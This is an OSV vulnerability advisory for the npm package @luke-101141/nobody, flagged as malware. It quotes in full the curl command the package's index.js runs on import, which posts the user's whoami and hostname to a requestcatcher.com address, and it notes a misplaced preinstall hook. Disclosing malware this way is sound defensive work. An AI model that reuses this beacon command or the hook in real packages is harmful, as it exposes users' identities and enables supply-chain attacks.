@luke-101141/nobody @1.0.1
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID: MAL-2026-4229
Ecosystem: npm
Summary
On require(), index.js executes curl -X POST "http://frgthyujiouyh.requestcatcher.com/noderedactedsdk/$(whoami)/$(hostname)/", leaking the installing user's identity and machine hostname over plaintext HTTP to an anonymous request-inspection service (requestcatcher.com) commonly used as a throwaway exfiltration sink. The package has no advertised functionality (empty description, no useful exports); its sole effect is the identity beacon. package.json also contains a top-level "preinstall": "node index.js" field outside the scripts block; as written it does not fire at install time, but the intent to trigger the same payload at npm install is explicit. Any consumer importing this package leaks host/user identity to the attacker.
Source: amazon-inspector (8a22de475581dbf26085c2605781782a61205eb62add0a261eabe2357ac2cbc8)